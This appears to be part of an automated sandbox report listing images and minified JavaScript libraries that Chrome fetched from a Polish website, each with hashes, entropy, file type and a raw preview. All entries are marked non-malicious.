                                                            MD5:28483DC93E9D2ED1BFFF609874C81419
                                                            SHA1:3BE3FA85A28BF942BBBEC7CC7C4354120BF71990
                                                            SHA-256:50458C105C6A39EA248A2E8CC8233AA9BBAD4B69BC316CCE721583A95379488C
                                                            SHA-512:F21EC4FF12E92878EAF67823F35B9F43A1C4B45EA673BFB833B5413C90B23388FFA35338CFDAE0335A02959720A0CCF5CF38D0FAC954F76B5677DC1EECFF0BD6
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...my.... W.....4....K...M..5..oM......~....}......u.s...X)rW.s..+..>he.=i.r*FL..s...S..6.....SW.M?=z.;..M&1.h...<z..R."..F.g..<.=.A.......)..pjx...V\..!....1O.....P}.i...y..B.=3M..<...z..vc.x.4.B..\.MI....J...#.0..l'..nxS.z.X4..K...8K{H.....z.........(6..]A|=.6....=..Fo...k..&...{....^...{......
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 200x200, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=11, height=2313, bps=146, orientation=upper-left, width=1831], baseline, precision 8, 500x500, components 3
                                                            Category:downloaded
                                                            Size (bytes):58539
                                                            Entropy (8bit):7.974421577528102
                                                            Encrypted:false
                                                            SSDEEP:768:/jf5PDxH656MHn+CgL584dURwJlMOHh9zcVfWzoeRVvg6NuSNEDl6O2PP1b9iI:/jBcc2nVgK4mRmZB9gV7UVvg6C6OexEI
                                                            MD5:ACCEB7B25F681B519E306AFBEBE49B52
                                                            SHA1:9889FA88640E92A687799BF617A98FE2D0BFDA25
                                                            SHA-256:B5D4B9D9C073155AFB95101853C23F2621257EECD4AA9B0D4F11663C62ADF6F8
                                                            SHA-512:17DA03AEE596928DD3F259041D35F082B55284C27708FF76E3C2C39F4256FCB4C965E906374A3CC3F8285035FC0DADEB954DF758F071DA33CD7B1B02D74D192C
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2018/10/disneyklejone-500x500.jpg
                                                            Preview:......JFIF..............Exif..II*...............'...........................................................................(...........1...........2...........i.....................................Adobe Photoshop CC (Macintosh)..2018:10:09 16:10:55...........0221....................o...........x.............................`...........h...(...................p...........;.............................JFIF.....^.^.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........~.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.................................................................
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 592 x 256, 8-bit/color RGBA, non-interlaced
                                                            Category:downloaded
                                                            Size (bytes):11139
                                                            Entropy (8bit):7.943057558161918
                                                            Encrypted:false
                                                            SSDEEP:192:+S0tKg9E05T06B9gWP6yaDK5Eh7vKbFSOCjQxeS4JrhK7bX6EihXvaeSbl:yXE05I8KWzkvq5CjNh6DOfXW
                                                            MD5:EC917CF95CD77D05E335610B7EC08BB3
                                                            SHA1:821CFF18C11C70340028E0CD61AF4D1C0B67D9CB
                                                            SHA-256:1CEFABD7EAA3615CB804216526C478A916E24BE8D10D11BA7D02717003AC84E6
                                                            SHA-512:3345B79959D9A2C42858752551248898EE6B17519259C51ECA1322C3556AB0276AA90F045ED052FF9687BC93CCC91B2F16FB8FBBD6F1626830AC147D1520D176
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2015/07/StarWars.png
                                                            Preview:.PNG........IHDR...P.........|.H/....pHYs...#...#.x.?v...OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (1626)
                                                            Category:dropped
                                                            Size (bytes):1819
                                                            Entropy (8bit):5.047296238035306
                                                            Encrypted:false
                                                            SSDEEP:24:aUTV//j2ew8p/xnqy8VLF8Xlm7uEQGe1dLpDXzRRvCpx+zVfDpnOKLJWbqQApIsi:HgQBq5LYlm71TopDaW1ObqhuqVcPf
                                                            MD5:CD0EB3406096FF80266E7C9D7D419186
                                                            SHA1:0E3709691BF96233766DE30E2FD473B84166C5B6
                                                            SHA-256:C2E606E1FC82EA3A554AAD5D0520E25D2677B89A891DC5C49E7ACE08FCE92E25
                                                            SHA-512:3CAF5308CDBC5F42F1ECCF5944E8CA785AC086B85954765C1F40D91BD9CC9F3FE6EB816AD821B534F9AD36395F4B6B5D361BEA24EB272E94CAD2824F03FAAAC6
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:/*!. * Masonry v2 shim. * to maintain backwards compatibility. * as of Masonry v3.1.2. *. * Cascading grid layout library. * http://masonry.desandro.com. * MIT License. * by David DeSandro. */.!function(a){"use strict";var b=a.Masonry;b.prototype._remapV2Options=function(){this._remapOption("gutterWidth","gutter"),this._remapOption("isResizable","isResizeBound"),this._remapOption("isRTL","isOriginLeft",function(a){return!a});var a=this.options.isAnimated;if(void 0!==a&&(this.options.transitionDuration=a?this.options.transitionDuration:0),void 0===a||a){var b=this.options.animationOptions,c=b&&b.duration;c&&(this.options.transitionDuration="string"==typeof c?c:c+"ms")}},b.prototype._remapOption=function(a,b,c){var d=this.options[a];void 0!==d&&(this.options[b]=c?c(d):d)};var c=b.prototype._create;b.prototype._create=function(){var a=this;this._remapV2Options(),c.apply(this,arguments),setTimeout(function(){jQuery(a.element).addClass("masonry")},0)};var d=b.prototype.layout;b.prototype.la
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 150x150, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=12, description=OLYMPUS DIGITAL CAMERA , manufacturer=OLYMPUS IMAGING CORP. , model=E-3 , orientation=upper-left, xresolution=231, yresolution=239, resolutionunit=2, software=Adobe Photoshop Elements 7.0 Windows, datetime=2018:01:15 16:53:54], progressive, precision 8, 886x367, components 3
                                                            Category:dropped
                                                            Size (bytes):247906
                                                            Entropy (8bit):7.957303310703297
                                                            Encrypted:false
                                                            SSDEEP:3072:m16np+Wl2DKbLC2j/HWTbC9uWzZOS0Sj2eZ4/Xos7uwrj0zXphJhF8+Sqhxtd3LZ:m1NDQCwAwzZOS0c2B/B6znhW+HUdA
                                                            MD5:BE5FA6C3EE0B6CD855990C5D88A2031E
                                                            SHA1:467C8F4B7CA4562628D078B58C2EC5CBD8CD5FC0
                                                            SHA-256:CFF8B2152891BBD60BA6324B6CF1F2AFFEFE4483CE9D18EE5D0B84F1CA1F637C
                                                            SHA-512:85CF010BB01D79E27591CCAE09D6B3B578AAF6E4FDB88E3A1943618B9A69CE706A10B6F2DEB63D1B65300D9CE310C40A2A1952CC159187A2F2E162CF00C1E70E
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:......JFIF..............Exif..II*........... ...................................................................(...........1...%.......2...............................0...i.......@.......OLYMPUS DIGITAL CAMERA .OLYMPUS IMAGING CORP. .E-3 .`....'..`....'..Adobe Photoshop Elements 7.0 Windows.2018:01:15 16:53:54.PrintIM.0300..%.............................................8.................P.....`... ..................................................................................................... ......................................................'.......'.......'.......'.......'..^....'.......'.......'.......'....................................................................................................................................@@........@@........@@............@@........@@........@@........................................................"...........'...................0221............................................................................
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, interlaced
                                                            Category:dropped
                                                            Size (bytes):13710
                                                            Entropy (8bit):7.962381680569804
                                                            Encrypted:false
                                                            SSDEEP:384:Iw0UzpzykAQq3+ZFYef9P76j5QS1j9w1SY:TFyJEZ2eVPej6ARw1SY
                                                            MD5:54D81791EAE6ABBA1CFE5C709D022F3C
                                                            SHA1:6CC0C7D251AAB952B17FAA1E1AE72B99A293872D
                                                            SHA-256:4DF07E0F3A3E8AD7D15938C8BEE91695CD0F30065CD3153E4BC2CBDB520EA057
                                                            SHA-512:428664FE1D38C37B783833C11690539E5197A7CFAEE98E1B437FC9B6471451658D07B2EA86527C2F3978664E006E95ED8B8B33C5D86A8C58E514052BE4804E65
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.PNG........IHDR...,..........{.=....pHYs...#...#.x.?v.. .IDATx...|.e...[..d.I.$..j &............q........go........SD...P...HH....;.M6.&.......v23.....7..NSZ.VH....h..L,.#.S.NY.v.....]PL`m.J(.n.w.7..;w..4(..r.=......,.>..1....v`[......>a(.0!.L>..C.b.Q...M...`.....".[8~......2dS7.<...o...i.xx....o.....gR.Ly.7!..7..[.........|v...t/..>.....x60{Pv.J...+V.;..4.'../.....x'@^....1...k.J...Za|..n.....P`b.....o.Y..........G.X,.9r.4.K....%[.t..;N.P......HOO.J....~.Gee.d..T...L..V..l.<.n_.o.Yb..v`,..J..cPPP...8...l....XP....V...5..'........<.Xy.c..R..*.t}..].EP..+222.RRR".YVT.I+..`.Edff.C...[Aegg[.t....X@n-.VP.:ujS0bq+..m.n....o..........$.rqE...gbL(N..`X.Hl..g.W..bC....l....S3.!..\h..>...O..lP........".L.0...'....=...#Zu.d....Z..e6..tz.p(..Y..q>.0..MT.L(....!.wV.=M.....;F...~1........a.y;.:.....w.6.k.....s.z&(..g........^.............j...1#M.wf.w|47..O.6.+wW$&..........W.a..hm...$._....=..........G..RE.G..B.%..,.Pe.....O:..P.(....j.G;j<Z
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 277 x 252, 8-bit/color RGBA, non-interlaced
                                                            Category:downloaded
                                                            Size (bytes):12164
                                                            Entropy (8bit):7.961970370115963
                                                            Encrypted:false
                                                            SSDEEP:192:5XBYCp0nsAXXIRmA5uZUezQH4pCBN8l6AccRfpwWBWaaOvQQt+FUAY8cKP:RKnFnI1Fe0yfccRfpDBWaVrRLKP
                                                            MD5:1B5A82586638A1D8AE000B2E10A0CC44
                                                            SHA1:15B06A2AABA74B6A0E9FDF462037D413B0E9EF32
                                                            SHA-256:02C9F8014E6916E0763E40BAA97BBD7A157D89C76265A052C13687BDCF335209
                                                            SHA-512:AD50DD09C1DBD213DBB686600684B2BF623699C92E7ADD00F9D0F4B8D20A39063686BCC78A6CB0F0DE24DFF7372FD144BC9284D117EFEB933A021396FB38BE26
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2016/08/canpol_ico.png
                                                            Preview:.PNG........IHDR.............Y.0.....gAMA....|.Q.... cHRM...........R...@..}y.....<.....s<.w.../iCCPICC Profile..H..wTT....wz..0..z..0... ..Q.f......Ml..@D...E......H..b!(.`.H.Pb0...dF.J|yy.......g.s..{....$O../... .'..z8.W.G....x....0Y.A..@$/7.z........H..e..O...O.T...._..lN:K.."N.....3"..$..F../JP.rb.[.}..Q..d.[..S..l1..x{..#b.G...\N..o.X3I....[ql2.....$..8.x.......t..r.p../8...p...C...f.q....K.njm.{r2.8...?......).L^6..g.,.qm."[.Z[Z....~Q....7%.."....3......R..`.j...[.~.:.. w....!.$E}k...yh.y...Rm..333..........:..}.=#.v.....e...tq.X)I)B>==......<..8..X....9<QD.h..8Q.yl....sy....0.OZ.k.(...5..H....>.....yP..........:.8......p.........Lg....k.k...$.......t.!0.V..8.7....`.........2A....@.....JP..A#h.'@.8.....:....`....`......a!2D..!UH.2.. .d..A>P ..ECq...B.....*.*.Z....:.]..B..=h...~....L...2...........5p.......N..........:|......@...QC.....!.H,.G6 .H9R.. ]H/r..A..w(......Q.(OT...JCm@..*QGQ...-.(j...MF+...6h/.*t.:.]..G7....w...7......Xa<1...:L1....s.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, non-interlaced
                                                            Category:downloaded
                                                            Size (bytes):16961
                                                            Entropy (8bit):7.973661003786498
                                                            Encrypted:false
                                                            SSDEEP:384:I2KnFnDP4llxpDZfMf0GJEgZjuIeSWMIUW8kNYO72RL9mxx:g1opDdMfd6gZjDeSo3KO8mX
                                                            MD5:4729A7AFCFE8A46646BBC2BF637D45FB
                                                            SHA1:16F11697A1163AC2030F89CB45EAF5F45D648B6F
                                                            SHA-256:5F3E0E50DF88579102F735609E1AD6F5141295B17D8D64404E31D9864262D023
                                                            SHA-512:7A1B6086DD698983B6A8B33153FB8A58A85BFAD9F9B15DF0F00DAB024CBBFD391DBE7E2313676C8C5D222186BE7AA44845721ECC1BBDEE54DCE434AA2FC52505
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2015/07/auchan_glowna_thumb.png
                                                            Preview:.PNG........IHDR...,.........r|......gAMA....|.Q.... cHRM...........R...@..}y.....<.....s<.w.../iCCPICC Profile..H..wTT....wz..0..z..0... ..Q.f......Ml..@D...E......H..b!(.`.H.Pb0...dF.J|yy.......g.s..{....$O../... .'..z8.W.G....x....0Y.A..@$/7.z........H..e..O...O.T...._..lN:K.."N.....3"..$..F../JP.rb.[.}..Q..d.[..S..l1..x{..#b.G...\N..o.X3I....[ql2.....$..8.x.......t..r.p../8...p...C...f.q....K.njm.{r2.8...?......).L^6..g.,.qm."[.Z[Z....~Q....7%.."....3......R..`.j...[.~.:.. w....!.$E}k...yh.y...Rm..333..........:..}.=#.v.....e...tq.X)I)B>==......<..8..X....9<QD.h..8Q.yl....sy....0.OZ.k.(...5..H....>.....yP..........:.8......p.........Lg....k.k...$.......t.!0.V..8.7....`.........2A....@.....JP..A#h.'@.8.....:....`....`......a!2D..!UH.2.. .d..A>P ..ECq...B.....*.*.Z....:.]..B..=h...~....L...2...........5p.......N..........:|......@...QC.....!.H,.G6 .H9R.. ]H/r..A..w(......Q.(OT...JCm@..*QGQ...-.(j...MF+...6h/.*t.:.]..G7....w...7......Xa<1...:L1....s.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, interlaced
                                                            Category:dropped
                                                            Size (bytes):13571
                                                            Entropy (8bit):7.96743093183519
                                                            Encrypted:false
                                                            SSDEEP:192:IiOks0/6EoEuj3T21sIrwNkCj0HyYERTq/+lTHK27ah65SLReGNd6JQKiEBLk:IiOk/6TEujj3324cMq7h65FJQ1H
                                                            MD5:C1398214BEDF49C324AEF1066FC3547E
                                                            SHA1:5B07163806FFA6889CEF7F51B1C9EA31B5DE7448
                                                            SHA-256:740B6892F77A968B8B341A78D495E6F2D3442F5E27C3F11052864EDC8700D5A7
                                                            SHA-512:54EFAFC63BF23041490167A9BD1F7807C2DB6DE5FE746D274889EC327CB1FEBB2933508CA615583DFF808E80CC70250E2E8A5FAEE31779AFD88D920C7B47590A
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.PNG........IHDR...,..........{.=....pHYs...#...#.x.?v.. .IDATx...|.E...rL..p.....H..DE.\.u..Zq=V.......u=..U......u..9T...C.K.....B .d2..."....d:..t...?3..........A2".X' ..0.....kW.m..9.%...$......(...r...k.=..^.....+))...zg....N.ZT'.t..4./U>......S..)...~..g.XN..Yg.E;v.q...}..O.|.?...[...)...QJJ.L..( .A.~...%.n..'5.........k.....C....)_.-ZD...w.}W..\.}.>....,",...Z.t.i.!Q.$$$..g.M.-.'a..'L-.0...:'...N....)//..).....4h..h.:a"Q.g.yf.w.e..T'.....^.z.....S.*--....*. \^TM...V_..+.t..u..cE.0....v{..}j..B.X...rM.&.../..P..R^..T..p..R..i.....E=v#6....9Q.rF$..W.M...w.....O...HP...Q..Z.F.....`.6m.&.HPT.E...-Z.+1j.*Q.m.Q%*.b...7...........'..(...U.u.F...A!..0../^,.#..=v.........m.d...#.s..T.a.%..L....`....../.._^yph..CeBM..U..~.|..n=...@..S.._ ..<.B.....{.......rMIDbb..IQ..6Q...O.....).f...,X.v..OTC.....&j.u.....RIT...B.W...7.<v.-.h.....)..6m.:1n...,Y.H.]..&Q.......f+...J.G...~....D{ 5..099..um.8_,.)..v..K;.k.h....&Q"A..N...=}..aT.Y....,.pf..3K.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, non-interlaced
                                                            Category:downloaded
                                                            Size (bytes):16101
                                                            Entropy (8bit):7.9701245081782774
                                                            Encrypted:false
                                                            SSDEEP:384:I9aQqeX5GwvLYtMC//6yzQw5hvPPpE2fehEmPLoMDJABTAQr:UZBWOytZE6ehEoos+NX
                                                            MD5:849067D42A5222B9BFA0045BDE05F57B
                                                            SHA1:A2B0A92E257992513D8529B4186BD7B37562DCA5
                                                            SHA-256:4C41859F6CA21A34BCD068A85D9A65A9E07DE7E5C58C794B156E61D8BF1633F3
                                                            SHA-512:30A8C07F6211C2DCF1BA9F4DB30D3E3298227DCF6B53C5F3E83DFB2D4C8E3CA60E81E680988D1D0595FAA251B2BD9ADC8F18AF2BA649B4F733514275E3D6E13E
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2015/07/disney_descendans.png
                                                            Preview:.PNG........IHDR...,.........r|......bKGD.......C......pHYs...#...#.x.?v....tIME......56.uT.. .IDATx..w|........dIV.,.U......bJh.t.$_HB.M...R ..nB...R.....z1`:.wu...9:}w..CG.6.6..<..0::.fw.}..YP(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...@."8.H).X,..]]]...Q.D".4M.*.c....q:..@ .6;;.%..s...T%...i..#...........1.@.@ .....r.t:U!}.H&.$.........a233....?...n.B.T))a}.E...ug}}...@....INN.*.O...........-))y8;;..J\JX..f_$...m.~.......T...........]......|.Q.E%.O...[.n}...%%%x<.U(.!b.......1....4!D\....(*a....W.+,,....W...............5M. ...T....Y.X.....w.Q^.U)...u..EG...m.....R......*..~u.M..5j.C..;.L&Y.n].....y...*i)a}..@..,[.l.q..JV..Ik.....&....j.<T.....\.dI..#.>.O..b.D".._..8qb..".J...T......6lx...H.J._|>.EEE...6.!.t..Q.:..2:::~lY..."U .......&ttt\/.4T.(a.-ael......0..Eyy9[.l.NJ..JC..h..QWW........T.J.0;;;P[[{...JD..#......KKKUa(....RZZZ..m;[....G.]544....r
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (9354)
                                                            Category:dropped
                                                            Size (bytes):9531
                                                            Entropy (8bit):5.016514932736511
                                                            Encrypted:false
                                                            SSDEEP:192:F+VgksRTuuE2mBrcPgfMGFTsPWl7h12JyF:F1duuE7xhxsPS0A
                                                            MD5:65941CBC22665FE5913213A865679E12
                                                            SHA1:8BB14561F9AF47C0B965D0216B9C4DDC39DA9FF0
                                                            SHA-256:E94B12CB948D3D2EFF43ADDF04700F8611BA383C00892652DC294A76BEC2A105
                                                            SHA-512:C5DEB96E36CE773C5B3BFAB85A1D8D1A4DC1FB43B9A5767E29A2B12D1EC80F3CF2E652D7C4B1BBCDECD0A7E76F578541C5BB07B1995DB4F835258A60DB494391
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:/*!. * jQuery UI Menu 1.12.1. * http://jqueryui.com. *. * Copyright jQuery Foundation and other contributors. * Released under the MIT license.. * http://jquery.org/license. */.!function(e){"function"==typeof define&&define.amd?define(["jquery","./core"],e):e(jQuery)}(function(a){return a.widget("ui.menu",{version:"1.12.1",defaultElement:"<ul>",delay:300,options:{icons:{submenu:"ui-icon-caret-1-e"},items:"> *",menus:"ul",position:{my:"left top",at:"right top"},role:"menu",blur:null,focus:null,select:null},_create:function(){this.activeMenu=this.element,this.mouseHandled=!1,this.element.uniqueId().attr({role:this.options.role,tabIndex:0}),this._addClass("ui-menu","ui-widget ui-widget-content"),this._on({"mousedown .ui-menu-item":function(e){e.preventDefault()},"click .ui-menu-item":function(e){var t=a(e.target),i=a(a.ui.safeActiveElement(this.document[0]));!this.mouseHandled&&t.not(".ui-state-disabled").length&&(this.select(e),e.isPropagationStopped()||(this.mouseHandled=!0),t.has(".ui-
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, interlaced
                                                            Category:downloaded
                                                            Size (bytes):29760
                                                            Entropy (8bit):7.982300745376012
                                                            Encrypted:false
                                                            SSDEEP:768:rQtTO+Lhqax1Tkb0k7eMJjo2th1tfYKttGVwsC+bcxwI:Whx1TkYMRo2th1tYKttGVwsCXxwI
                                                            MD5:D546EF6393050CFCC04B05275BB4F31A
                                                            SHA1:2BD39611FB8DC83D071F2D540C37511F51803181
                                                            SHA-256:2CBC70E6E84A45A9848965C5C4A5D901CEF212BB5E01FFB018D2F45DCF504699
                                                            SHA-512:1EF81B7DF7599832B47115EE72513F9E131F9B31773DC78BC8298AE6B697F2508591370CEBB304B2A68049FB850F6CAFBDD9696AF7C39F2D0A87910A73010998
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2015/07/polomarket_glowna_thumb.png
                                                            Preview:.PNG........IHDR...,..........{.=....pHYs...#...#.x.?v.. .IDATx..}...E.......{7.........p...!.-..."...... .......K...Q.B8B.....f7{.....U.....3;..dg....NOwuUu..W.z.J.m...u.+P.Q....bk...L..7.I.&,.b{[)..J.\Y-.1e.dY./.#..z..HI....%K^X.p.!...Ry...W.,..}g....===..RV...D..p*.[.....=..[.wl..}..-9i$.AZ{^1...H...T|@B.:.3.x2ea.:,..J+V1......%:.^....}5.T..g.@.V..U..x...hM.a.P.:t5...CYx(.-...m.....x.$$l..........7?u..E.......x.O..,...(#...B.e....r.....\.W)*'...S...+...u.=.}.,.IM9.i,.Z...&O....c..><+w.]D.4F.bT?.......\~.2...i.Td.y.otm.....g..M..^.a.E..CR1&W....!.i.....x5.m.M..&(T../nG...q4.^.%kt^B.....J.hG!.....`%.......f ...{....i2n[..I.....~....-Tf...[...............>.T..........[1.}.V.^...o..<.....{.Y..-.b.......n..g>3AQ.........,XP...W_}..}}}.....@...-..`zv.M3g.W.)..Qe.WUuL}}..r..>....!..U.Q..=.......Z^..n.....!.X..|..hT.J-<.T.x[Tj.{../..9w...R.e<...pP..V.X...A..*.~.z{.I..o.....y~...x.z%.B..WZ....z^..Y.XMi* 6..,....f,a.r.....
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, interlaced
                                                            Category:dropped
                                                            Size (bytes):14811
                                                            Entropy (8bit):7.967728999865378
                                                            Encrypted:false
                                                            SSDEEP:384:IHyj3RfScPhe5eCPEYGPTJPNQWxa/lwZVOm52jqMxx2:15scvTPTJF4lwZVL8jnx2
                                                            MD5:AB2298A0C8CBB58726EE6CD8F8BB2385
                                                            SHA1:98C119D0D3D5EC003FAE4F20363153F6C98790B1
                                                            SHA-256:8A9D0537BB6568321820FB04B5655D8FB78F08CD1105192776DFE4D1105D7CFA
                                                            SHA-512:20DAC6B4E1EF6D34D86AB112A546F955D90405FC5B609431B6BB70E940938DC44535BAD9A48F312D871E6A1D2A8CD31947A219D2688E5058170458E25B06A606
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.PNG........IHDR...,..........{.=....pHYs...#...#.x.?v.. .IDATx...|.e..?.5.TZ.".....T.P..."...b/g......q?=..'..S,(.."H5....BH..&[..}fw..d7.Iv....y...y..<...}.yf.$.2..)..D..S.a.]...;7e.R.....T..<..q..T.Z.j..C.5...f...........0....tM.EE.k./.V.....}.(i.6.D..~......_.+...'.0...._.........d.\.eV.t(.*.#......oXm....a...)..[)...G.`{..1....!..Hm..$......-a.r...7.7L..m.....r.2..}...?.,l..@.J....]...VT.....gO.....Q.%.......n..`.(.t1..~.z..0....>....~..X..l..%.9s..3:..F.Fm.....JH....{EE....S..I..i*K.o..by0M.}7..W..1.M&S.....jv.B.M.hZ.W..(..9.H.BI.........AaH|..7.......I..F...aT............%...F.@.5/((.UP..bLF..G..SSlR .bJ..Qm.m.1j....`c2J.b...~KJ..#...d0...>..2.CJKW:F.N......?Bt.H.Ov...uW|..;.}...^mdj:2V.U..rd.Y....4.=_|V.R.[..j.G.Z....j#.C.nx.}....`:.\..I..Q...d...U..KI1(...*..0..]J...h.:...&ES... ....-z..>...['..&`......s|.Zp.)....vr..,,m.:.S..."J8...u..a........".D.....W_=v.5.....{.....i8e-.N'.,Y2...5..j..j..Hr.... ...h......
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):22974
                                                            Entropy (8bit):7.976706380029138
                                                            Encrypted:false
                                                            SSDEEP:384:ISpWoWdp6CuWViJI/W6+cUJhkFSNDUs/q+je+oEDc4pGY0MfwIC/3Y8YA3C:7WoWvnMIj+cUs4NtRXFo4n0MtCdy
                                                            MD5:0DD8906F0895BB6DFF1125036276462A
                                                            SHA1:F73E58C61D721682F8F6172DCE27EEAC7ABFB145
                                                            SHA-256:10887D5C59A50A8DDF9D861F628B63E04B4A5BA4FCB2E3848F0DD18369F7923A
                                                            SHA-512:48B8101931AB95B8065EC4F8E80B482C544E34ECA80695DC8A07BA6C3D35620E464BA0556541B93F4BDD53023F51F0A0E9D9537222CD320F3E29178EA367ED0E
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.PNG........IHDR...,.........r|......bKGD..............pHYs...#...#.x.?v....tIME...... ..i... .IDATx..y.]Wu..9..o.Ws.J.d..I.mb.6..0...H......_..d..I.I:....@..NH.!L.....6.l..X.JR..yz.}w8...xUe.C:.6&9...V....=..>......b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,..... ..^X.1n......pg.Z...a1I.........W......e2...!.k.+X..D.V..;33.R.tY.P.P(...I.R..o..c@.E.aH.V.Z.R.Vioo?...{w.P.]!Dl.d...Z....>8::..B..moo......_....J%j.Zc........+\V.~..z...g...B..100`..........jua.M....>b.E+X?.b.>s...J...]K&..F.7D........M.6.&.hZ.X.z1...Zo;r...U.Vu...Z...fff....].v.".<!.0.*V.^,b..A.....cG.zU.eokpp..c.wg2.O.!.......X5....:u.c;v..l..r!Q.188._r.%...f?iE...4.TJ]v...}W\qE...D.......op.....`....m...c.^zi[.....<'.z...W...B.......&...*}.......XY...r9....N.8.1&m-b...+wnn.J...... ......(.v........Z....%X....n.....=.a.......1.h.a...+odd..;;;.6..|?.agggaxx.....Z.....sbb......|_.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, interlaced
                                                            Category:downloaded
                                                            Size (bytes):33950
                                                            Entropy (8bit):7.987703351027374
                                                            Encrypted:false
                                                            SSDEEP:768:cqn0Zz35DqAAUU9QBXmPKy3fIy5OgiANZSA:YZFVhdBpOOS
                                                            MD5:45CDC0C83C78C101CA1A9D6F2E5C449A
                                                            SHA1:76A9C4E883405C39593100DD75282E2E969B3813
                                                            SHA-256:AD677BA0B9F09909999492FFC2EFA136E4E58F3F74C04278EBA9FCDE04CE73BD
                                                            SHA-512:9B13C18A807B1FB47333617674164700CCABC93D116B56020875E0FE2047345BCB35C66CFFC66CAC088DF5FC56656C1A62BFC60DD11D4C394450CAB951B36C58
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2015/07/zabka_glowna_thumb.png
